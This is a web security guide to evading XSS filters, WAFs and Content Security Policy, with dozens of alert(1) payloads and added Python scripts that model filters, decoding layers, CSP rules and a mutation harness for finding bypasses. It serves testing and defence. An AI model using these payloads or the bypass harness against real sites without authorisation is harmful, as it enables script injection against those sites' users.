XSS Evasion Techniques

Advanced methods for bypassing XSS filters and security controls in web applications

This guide covers advanced techniques for bypassing Cross-Site Scripting (XSS) filters and security controls. Understanding these evasion methods is essential for thorough security testing and for demonstrating the limitations of inadequate protection mechanisms.

Understanding XSS Filters

Modern web applications implement various types of XSS protection:

  • Input validation: Checking user input against allowed patterns
  • Output encoding: Converting special characters to their HTML entity equivalents
  • Content Security Policy (CSP): Restricting which scripts can execute
  • WAF rules: Web Application Firewalls that block suspicious patterns
  • Browser XSS filters: Legacy reflected-XSS heuristics (Internet Explorer's XSS Filter, Chrome's XSS Auditor). Chrome removed the Auditor in version 78 and Edge removed its filter earlier; Firefox never shipped one, so current browsers provide no such layer

Basic Evasion Techniques

Case Variation

HTML tag and attribute names are case-insensitive, so the browser treats every spelling below as a script tag. A filter that compares against the lowercase string <script> only matches the lowercase spelling:

<ScRiPt>alert(1)</ScRiPt>

Tag Obfuscation

This targets filters that delete the string <script> once and do not re-scan their own output. Removing the inner tag from each half reassembles the outer one:

<scr<script>ipt>alert(1)</scr</script>ipt>

After a single pass the filter hands the browser <script>alert(1)</script>. A filter that strips repeatedly until nothing changes is not fooled by this, but it is still a denylist and falls to the other tags and handlers covered below.
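The two bypasses above (case variation and the nested tag) target the same class of filter: a denylist that deletes a fixed string once. The Python script below is added here as an illustration and is not part of the original guide. It builds such a filter, runs both payloads through it, and shows the two responses a developer would reach for: re-applying the rule until the text stops changing, and output encoding, which does not depend on guessing what the denylist forgot. The filter and payloads are constructed for the example.

```python
import html
import re

# Constructed filter for this example (not a filter from the page): it deletes
# the literal strings <script> and </script> in a single pass, which is how
# many hand-rolled denylists behave. A case-sensitive variant is included to
# show the case-variation bypass as well.
SCRIPT_TAG_CASE_SENSITIVE = re.compile(r"</?script>")
SCRIPT_TAG_ANY_CASE = re.compile(r"</?script>", re.IGNORECASE)

# The two payloads from the text.
MIXED_CASE = "<ScRiPt>alert(1)</ScRiPt>"
NESTED = "<scr<script>ipt>alert(1)</scr</script>ipt>"


def strip_once(payload: str, pattern: re.Pattern = SCRIPT_TAG_ANY_CASE) -> str:
    """Single-pass removal: deleting the inner tag reassembles the outer one."""
    return pattern.sub("", payload)


def strip_until_stable(payload: str, pattern: re.Pattern = SCRIPT_TAG_ANY_CASE) -> str:
    """Re-apply the rule until the text stops changing. This closes the nesting
    hole, but it is still a denylist: <svg onload=...> passes straight through."""
    previous = None
    while previous != payload:
        previous, payload = payload, pattern.sub("", payload)
    return payload


def encode_for_html(payload: str) -> str:
    """Output encoding for an HTML text or attribute context: the fix that does
    not depend on guessing what the denylist forgot."""
    return html.escape(payload, quote=True)


def contains_script_tag(markup: str) -> bool:
    """Rough post-condition used by the demo: did a real script open tag survive?"""
    return re.search(r"<script\b", markup, re.IGNORECASE) is not None


def demo() -> dict:
    """Run both payloads through each filter and report what the browser would get."""
    return {
        "case_sensitive_filter": strip_once(MIXED_CASE, SCRIPT_TAG_CASE_SENSITIVE),
        "one_pass_filter": strip_once(NESTED),
        "stable_filter": strip_until_stable(NESTED),
        "output_encoding": encode_for_html(NESTED),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:22} {result!r:50} script tag survives: {contains_script_tag(result)}")
```

The one-pass filter turns the nested payload into exactly the tag it was meant to remove; the stable filter reduces it to alert(1) as plain text; the encoded form contains no angle brackets at all, whatever the payload.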

Attribute Splitting

An attribute name cannot be split: the browser reads "o n error" as three separate attributes, so a payload broken inside onerror never fires. What can be varied is the separator between attributes. Tab, line feed and form feed all terminate the previous attribute just as a space does, and a slash after a value-less attribute does too, which defeats filters that expect a single space before the handler name:

<img src=x
onerror=alert(1)>

<img/src/onerror=alert(1)>

In the second form src is present but empty, which is enough to fire the error event.

Encoding-Based Evasion

HTML Entity Encoding

Character references are decoded in text and in attribute values, never while the browser tokenises tags. Encoded this way the payload renders as literal text and does not execute:

&lt;script&gt;alert(1)&lt;/script&gt;

It becomes useful in two situations: the application decodes entities after the filter has run (a double-decoding bug), or the injection point is inside an attribute value, such as an event handler or an href, where the browser decodes references before interpreting the value (see JavaScript Protocol Obfuscation below).

URL Encoding

The web server or framework decodes percent-encoding before the value reaches the application, so this form only defeats a filter that inspects the raw query string. Against a WAF that decodes once, the usual probe is a second layer of encoding (%253C for <): the WAF sees %3C and passes the request, and an application that decodes a second time sees <:

%3Cscript%3Ealert(1)%3C%2Fscript%3E

Unicode Encoding

JavaScript accepts \uXXXX escapes inside identifiers, so its parser reads \u0061lert as alert. This only helps in a JavaScript context (a script body, an event handler, a javascript: URL) where the payload reaches the engine unchanged, and only against filters that look for the function name rather than the surrounding tag:

<script>\u0061lert(1)</script>

Hex Encoding

Hexadecimal character references (&#x61; for a) are decoded inside attribute values, where they hide a function name from a filter that searches for alert. They are not decoded inside a script element, whose content is raw text: <script>&#x61;lert(1)</script> is a JavaScript syntax error and runs nothing. Place the reference in an event handler instead:

<img src=x onerror="&#x61;lert(1)">
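The four encoding subsections above come down to one question: who decodes what, and when. The Python script below is an added example, not part of the original guide, and models the three decoders involved: a WAF that URL-decodes once, an application that decodes twice, and the browser, which decodes character references in attribute values but not inside a script element, and \uXXXX escapes inside JavaScript identifiers. The WAF rule and the probes are constructed for the example.

```python
import html
from urllib.parse import unquote

# Constructed WAF rule for this example (not a product signature): block any
# request whose inspected value contains the start of a script tag.
def waf_blocks(value: str) -> bool:
    return "<script" in value.lower()


def waf_view(raw_param: str) -> str:
    """What a WAF that URL-decodes exactly once inspects."""
    return unquote(raw_param)


def app_view(raw_param: str, decode_rounds: int = 2) -> str:
    """What the application ends up with when its framework decodes once and
    its own code decodes again (a double-decoding bug), or more generally when
    filter and application disagree on the number of decoding rounds."""
    value = raw_param
    for _ in range(decode_rounds):
        value = unquote(value)
    return value


def bypasses_waf(raw_param: str) -> bool:
    """True when the WAF lets the request through but the application still
    receives a script tag."""
    return not waf_blocks(waf_view(raw_param)) and waf_blocks(app_view(raw_param))


def browser_attribute_value(attr: str) -> str:
    """Attribute values have their character references decoded before the
    value is interpreted (URL scheme, event handler source)."""
    return html.unescape(attr)


def browser_script_body(body: str) -> str:
    """Script element content is raw text: no character reference decoding."""
    return body


def js_identifier_escape(source: str) -> str:
    """Approximation of how the JavaScript parser reads \\uXXXX escapes in an
    identifier; Python's unicode_escape codec decodes the same form."""
    return source.encode("ascii").decode("unicode_escape")


# Constructed probes: the single-encoded payload from the text and its
# double-encoded form.
SINGLE_ENCODED = "%3Cscript%3Ealert(1)%3C%2Fscript%3E"
DOUBLE_ENCODED = "%253Cscript%253Ealert(1)%253C%252Fscript%253E"


def demo() -> dict:
    return {
        "single_encoded_bypasses": bypasses_waf(SINGLE_ENCODED),
        "double_encoded_bypasses": bypasses_waf(DOUBLE_ENCODED),
        "href_as_browser_sees_it": browser_attribute_value("javas&#99;ript:alert(1)"),
        "handler_as_browser_sees_it": browser_attribute_value("&#x61;lert(1)"),
        "script_body_as_browser_sees_it": browser_script_body("&#x61;lert(1)"),
        "identifier_escape": js_identifier_escape(r"\u0061lert(1)"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:32} {value!r}")
```

The single-encoded probe is caught because the WAF decodes it to the same string the application gets; the double-encoded probe passes because the WAF stops one round short. The attribute and script-body functions show why the same reference works in an onerror handler and fails inside a script tag.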

Advanced Filter Bypass Techniques

Non-Standard Tags and Events

Denylists tend to cover the well-known combinations (script, img with onerror, body with onload). The same handlers on other elements, and less common events, often pass. Both payloads fire without user interaction; the open attribute on details raises the toggle event as soon as the element is parsed:

<svg onload="alert(1)">
<details ontoggle="alert(1)" open>

JavaScript Protocol Obfuscation

The browser decodes character references in an href value before it looks at the URL scheme, so a reference anywhere in javascript: hides the keyword from a filter that compares the raw attribute. The link still has to be clicked:

<a href="javas&#99;ript:alert(1)">Click me</a>

DOM Clobbering

DOM clobbering uses the id and name attributes of injected elements to shadow properties that the page's JavaScript expects to be something else. Forms expose their named controls as properties that take precedence over the built-in ones, so an input named innerHTML replaces the form's real innerHTML property with the input element:

<form id="test"><input name="innerHTML" value="<script>alert(1)</script>"></form>

Nothing executes on its own; the value is just a string. The payload fires only when the page's own code later trusts the clobbered property or the input's value and writes it into the document, so this technique is a way to reach such code, not a self-contained vector.

Null Bytes

Older parsers, notably Internet Explorer, ignored null bytes inside a tag name, so <scri%00pt> reached the page as <script> while a filter that compared strings literally saw no match. The HTML5 tokeniser replaces a null in a tag name with U+FFFD, so current browsers do not execute this. It is still worth a probe because the null byte may truncate or confuse a C-based WAF, a logging layer or a server-side string function ahead of the application. Note that %00 only becomes a null byte once the value is URL-decoded:

<scri%00pt>alert(1)</script>

WAF Bypass Techniques

Regex Evasion

Signatures often key on a fixed sequence such as "<script>alert(". JavaScript comments, whitespace and line breaks can be inserted at almost any token boundary without changing what executes, so the sequence never appears:

<script>/* */alert(1)/* */</script>

Parameter Pollution

Send the same parameter twice. Many WAFs inspect only the first occurrence, while backends differ on which value they use: PHP's $_GET takes the last, Flask's request.args.get() takes the first, classic ASP.NET joins the values with commas and Express returns an array. Where the backend's choice differs from the WAF's, the WAF validates a value the application never uses:

?param=safe&param=<script>alert(1)</script>

Fragmentation

When the application joins several parameters into one piece of markup, the attack can be distributed so that no single parameter contains a complete tag or handler. A WAF that inspects values one at a time sees only harmless fragments; the page assembles them into a working img tag:

?param1=<img&param2=src="x"&param3=onerror="alert(1)"
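Both WAF bypasses above exploit the gap between how the WAF and the application parse the same query string. The Python script below, an added example that is not part of the original guide, parses the two query strings with the standard library, applies a constructed per-parameter signature the way a WAF would, and then shows what different backends actually use. The signature, query strings and the concatenating application are all constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Constructed per-parameter WAF signature for this example (not a product rule):
# a tag carrying an event handler, or a script tag, inside one parameter value.
SIGNATURE = re.compile(r"<\w+[^>]*\bon\w+\s*=|<script", re.IGNORECASE)

# Constructed query strings (percent-encoding omitted for readability).
POLLUTED = "param=safe&param=<script>alert(1)</script>"
FRAGMENTED = "param1=<img&param2=src=x&param3=onerror=alert(1)>"


def waf_blocks(query: str, first_only: bool = True) -> bool:
    """Inspect values one parameter at a time, the way a WAF does. Many WAFs
    also look only at the first value of a repeated parameter (first_only)."""
    for values in parse_qs(query).values():
        candidates = values[:1] if first_only else values
        if any(SIGNATURE.search(v) for v in candidates):
            return True
    return False


# Backends disagree on which of the duplicate values they use.
def first_wins(query: str, name: str) -> str:      # Flask request.args.get()
    return parse_qs(query)[name][0]


def last_wins(query: str, name: str) -> str:       # PHP $_GET
    return parse_qs(query)[name][-1]


def comma_joined(query: str, name: str) -> str:    # classic ASP.NET Request.QueryString
    return ",".join(parse_qs(query)[name])


def concatenating_app(query: str, names) -> str:
    """An application that builds one piece of markup from several parameters.
    Each fragment is harmless alone; the page assembles the img tag."""
    params = parse_qs(query)
    return " ".join(params[n][0] for n in names)


def demo() -> dict:
    rendered = concatenating_app(FRAGMENTED, ["param1", "param2", "param3"])
    return {
        "polluted_blocked_first_only": waf_blocks(POLLUTED),
        "polluted_blocked_all_values": waf_blocks(POLLUTED, first_only=False),
        "php_sees": last_wins(POLLUTED, "param"),
        "flask_sees": first_wins(POLLUTED, "param"),
        "aspnet_sees": comma_joined(POLLUTED, "param"),
        "fragmented_blocked": waf_blocks(FRAGMENTED, first_only=False),
        "fragmented_rendered": rendered,
        "rendered_matches_signature": SIGNATURE.search(rendered) is not None,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:30} {value!r}")
```

Note that parse_qs splits each pair on the first equals sign only, which is why src=x survives as a value; most server frameworks behave the same, and that is what lets the fragments carry their own attribute syntax.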

CSP Bypass Techniques

JSONP Endpoints

A policy that allowlists a host trusts every script that host will serve. A JSONP endpoint on an allowlisted origin reflects its callback parameter into the response body, so the browser runs attacker-chosen code from a permitted source (here the response body begins with alert(1)). This works against host allowlists, including 'self' when the JSONP endpoint lives on the application's own origin, but not against nonce-based policies with 'strict-dynamic', which ignore host sources:

<script src="https://trusted-domain.com/jsonp?callback=alert(1)"></script>

DOM-Based Bypasses

A javascript: navigation is inline script as far as CSP is concerned, and it cannot carry a nonce, so any script-src without 'unsafe-inline' blocks it. The line below therefore only works against a policy that already permits inline script, and it assumes attacker code is already running:

location.href = 'javascript:alert(1)';

The DOM-based angle that does matter is that CSP controls where script is loaded from, not what permitted script does with untrusted data. A site library that builds a script src or a URL from attacker-controlled DOM attributes runs with the policy's own allowances, so DOM sinks inside allowlisted code remain a target.

Unsafe Inline Bypasses

If script-src contains 'unsafe-inline' and no nonce or hash, every inline script runs and no special payload is needed. Once a nonce (or hash) is listed, browsers ignore 'unsafe-inline' and an inline script runs only when its nonce attribute matches the header. The weakness to look for is then a nonce that is static, reused across responses or otherwise predictable; a hard-coded value such as the placeholder below lets an attacker simply include it:

<script nonce="CSP-NONCE">alert(1)</script>
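The three CSP subsections above each depend on a specific rule of script-src evaluation. The Python script below is an added example, not part of the original guide and not a browser's CSP engine: it implements only the CSP Level 3 rules those three cases turn on, so that a tester can check a captured policy against the JSONP, javascript: URL and inline-script cases before trying them. The policies, page origin and JSONP URL are constructed; wildcards, paths, scheme-only sources, hashes and redirects are not modelled.

```python
from urllib.parse import urlsplit

# Rules implemented (CSP Level 3, simplified):
#   * inline script and javascript: URLs run when 'unsafe-inline' is present
#     and no nonce or hash source is, or when the script carries a listed nonce;
#   * an external script runs when its origin matches 'self' or a host source,
#     unless 'strict-dynamic' is present, which makes host sources ignored.


def script_src_tokens(policy: str) -> list:
    """Return the source expressions of the script-src directive, verbatim."""
    for directive in policy.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "script-src":
            return parts[1:]
    return []


def _has_nonce_or_hash(tokens: list) -> bool:
    return any(t.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for t in tokens)


def inline_allowed(policy: str, nonce: str = "") -> bool:
    """Would an inline <script> (with the given nonce attribute, if any) execute?"""
    tokens = script_src_tokens(policy)
    if nonce and f"'nonce-{nonce}'" in tokens:
        return True
    # CSP2 and later: once a nonce or hash is listed, 'unsafe-inline' is
    # ignored; 'strict-dynamic' ignores it as well.
    return ("'unsafe-inline'" in tokens
            and not _has_nonce_or_hash(tokens)
            and "'strict-dynamic'" not in tokens)


def javascript_url_allowed(policy: str) -> bool:
    """location.href = 'javascript:...' is inline script that cannot carry a nonce."""
    return inline_allowed(policy)


def external_allowed(policy: str, script_url: str, page_origin: str, nonce: str = "") -> bool:
    """Would <script src=script_url> execute on a page served from page_origin?"""
    tokens = script_src_tokens(policy)
    if nonce and f"'nonce-{nonce}'" in tokens:
        return True
    if "'strict-dynamic'" in tokens:
        return False  # host sources and 'self' are ignored; without a nonce nothing loads
    parts = urlsplit(script_url)
    origin = f"{parts.scheme}://{parts.netloc}"
    if "'self'" in tokens and origin == page_origin:
        return True
    return any(t in (origin, parts.netloc) for t in tokens if not t.startswith("'"))


# Constructed inputs for the demo.
JSONP = "https://trusted-domain.com/jsonp?callback=alert(1)"
PAGE = "https://app.example"
HOST_ALLOWLIST = "default-src 'self'; script-src 'self' https://trusted-domain.com"
LEGACY_INLINE = "script-src 'unsafe-inline' https://trusted-domain.com"
NONCED = "script-src 'nonce-r4nd0m' 'unsafe-inline'"
STRICT = "script-src 'nonce-r4nd0m' 'strict-dynamic' https://trusted-domain.com"


def demo() -> dict:
    return {
        "jsonp_under_host_allowlist": external_allowed(HOST_ALLOWLIST, JSONP, PAGE),
        "jsonp_under_strict_dynamic": external_allowed(STRICT, JSONP, PAGE),
        "javascript_url_under_legacy": javascript_url_allowed(LEGACY_INLINE),
        "javascript_url_under_nonce": javascript_url_allowed(NONCED),
        "inline_without_nonce": inline_allowed(NONCED),
        "inline_with_leaked_nonce": inline_allowed(NONCED, nonce="r4nd0m"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:30} {value}")
```

The output shows the three facts the text relies on: the JSONP script is allowed by the host allowlist and refused under 'strict-dynamic'; the javascript: URL is allowed only by the legacy 'unsafe-inline' policy; and with a nonce present, 'unsafe-inline' no longer helps while a known nonce does.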

Browser-Specific Bypasses

Chrome XSS Auditor Bypasses

Chrome's XSS Auditor blocked reflected payloads that appeared both in the request and in the response; Chrome removed it in version 78 and Edge dropped its equivalent filter earlier, so there is nothing left to bypass in current browsers. The payload below, kept for reference, reads as an attribute breakout for an injection point inside a single-quoted href: the leading quote closes the value, onclick becomes a new attribute, and the trailing // comments out the rest of the handler. As written here, inside double quotes, it is inert:

<a href="'onclick=alert(1)//">Click me</a>

Safari Bypasses

Nothing here is specific to Safari; the snippet behaves the same in every browser. What it does demonstrate is a property of innerHTML that matters for filter testing: a script element inserted through innerHTML is not executed, but an img with an onerror handler inserted the same way fires as soon as the image fails to load, so payloads for innerHTML sinks should use event handlers rather than script tags:

<div id="x">x</div><script>document.getElementById('x').innerHTML='<img src=x onerror=alert(1)>'</script>

Practical Evasion Methodology

Filter Analysis

  1. Identify filtering mechanism: Determine what type of filter is in place
  2. Test basic inputs: Understand what triggers the filter
  3. Analyze responses: Look for clues in error messages or behavior

Bypass Development

  1. Start with known bypasses: Try established techniques first
  2. Combine methods: Use multiple evasion techniques together
  3. Iterate and refine: Adjust your approach based on results

Testing Framework

Develop a systematic approach:

  1. Create a baseline: Establish what's being blocked
  2. Test variations: Try different encoding and obfuscation methods
  3. Document successes: Record which techniques work
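The methodology above as a runnable harness, added here as an example and not part of the original guide. The target filter, the baseline probes and the mutations are all constructed for the example; in practice blocked is replaced by a function that submits each payload to the real application and reports whether the response shows it rejected or altered. Each mutation is chosen so that the browser still executes the same thing, and every single mutation and every pair is tried so that combined techniques are not missed.

```python
import re
from itertools import combinations

# Constructed target for this example (not a product rule): a denylist regex
# of the kind a simple WAF or input filter applies. Replace `blocked` with a
# function that sends the payload to the real target.
BLOCKLIST = re.compile(r"<script|\bon\w+\s*=|javascript:|alert\s*\(", re.IGNORECASE)


def blocked(payload: str) -> bool:
    return BLOCKLIST.search(payload) is not None


# Step 1, baseline: one probe per injection primitive.
BASELINE = {
    "script tag": "<script>alert(1)</script>",
    "img onerror": "<img src=x onerror=alert(1)>",
    "details ontoggle": "<details ontoggle=alert(1) open>",
    "javascript url": '<a href="javascript:alert(1)">x</a>',
}


# Step 2, mutations. Each keeps what the browser executes unchanged and
# returns its input untouched where it does not apply.
def mixed_case(p: str) -> str:
    # tag names are case-insensitive; JavaScript identifiers are not, so only
    # the tag name is touched
    def alternate(m):
        name = "".join(c.upper() if i % 2 else c for i, c in enumerate(m.group(2)))
        return "<" + m.group(1) + name
    return re.sub(r"<(/?)(\w+)", alternate, p)


def comment_in_call(p: str) -> str:
    # valid in every JavaScript context
    return p.replace("alert(", "alert/**/(")


def tab_in_scheme(p: str) -> str:
    # the URL parser strips tab and newline, so java<TAB>script: still resolves
    return p.replace("javascript:", "java\tscript:")


def entity_in_scheme(p: str) -> str:
    # character references are decoded in attribute values only
    return p.replace("javascript:", "javas&#99;ript:")


MUTATIONS = {f.__name__: f for f in (mixed_case, comment_in_call, tab_in_scheme, entity_in_scheme)}


def run(baseline=BASELINE, mutations=MUTATIONS, check=blocked) -> dict:
    """Step 3: try every single mutation and every pair, record what survives."""
    results = {}
    for name, payload in baseline.items():
        row = {"baseline": not check(payload)}
        for m_name, m in mutations.items():
            row[m_name] = not check(m(payload))
        for (a, fa), (b, fb) in combinations(mutations.items(), 2):
            row[f"{a}+{b}"] = not check(fb(fa(payload)))
        results[name] = row
    return results


def survivors(results: dict) -> list:
    """The documented successes, as (baseline, technique) pairs."""
    return sorted((name, tech) for name, row in results.items()
                  for tech, ok in row.items() if ok)


if __name__ == "__main__":
    for name, tech in survivors(run()):
        print(f"{name:18} survives with {tech}")
```

Against this particular denylist only the javascript: URL gets through, and only when two mutations are combined (a comment inside the call plus either a tab or a character reference in the scheme); no single mutation suffices. That is the point of trying pairs, and the survivors list is the record the last step of the methodology asks for.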

Next Steps

After mastering evasion techniques, explore: